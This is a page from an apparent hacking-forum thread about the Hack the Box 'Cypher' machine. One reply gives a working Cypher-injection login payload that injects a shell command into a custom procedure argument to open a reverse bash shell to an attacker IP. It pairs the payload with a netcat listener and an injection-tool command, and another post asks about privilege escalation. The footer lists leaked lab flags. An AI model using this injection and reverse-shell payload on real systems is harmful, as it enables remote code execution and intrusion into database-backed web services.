JOIN BREACHFORUMS TELEGRAM
Cypher Hack the Box Season 7 (Linux Medium)
by RedBlock - Saturday March 1, 2025 at 01:37 PM
Breached
Member
Posts: 7
Threads: 0
Joined: Sep 2024
Reputation: 0
#21
Mar 03, 2025, 05:25 PM
how do you guys know that --custom-yara-rule with debug flag might return the file content for privesc? btw can we escalate to root on this machine?
Reply
Breached
Member
Posts: 1
Threads: 0
Joined: Mar 2025
Reputation: 0
#22
Mar 31, 2025, 02:26 PM
(Mar 01, 2025, 07:47 PM)shu8uiuhosduhio Wrote: working with the cypher injection so far no sucess

git clone https://github.com/sectroyer/cyphermap

python3 cyphermap.py -u "http://cypher.htb/api/auth" -d '{"username":"*","password":"Password123"}'

Hi, try this on burpsuit repeter :

{
    "username": "user' return h.value as a union CALL custom.getUrlStatusCode(\"http://cypher.htb; bash -c 'bash -i >& /dev/tcp/10.10.X.X/4444 0>&1'\") YIELD statusCode AS a RETURN a;//",
    "password": "123"
}

and on your machine :
└─# nc -lvnp 4444

Smile
A
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 73 2,317 2 hours ago
Last Post: louikizzz
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 89 8,091 2 hours ago
Last Post: Xploitd
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 621 5 hours ago
Last Post: chufoni
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 28 2,847 6 hours ago
Last Post: chufoni
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,589 6 hours ago
Last Post: Johe

Forum Jump:


 Users browsing this forum: 1 Guest(s)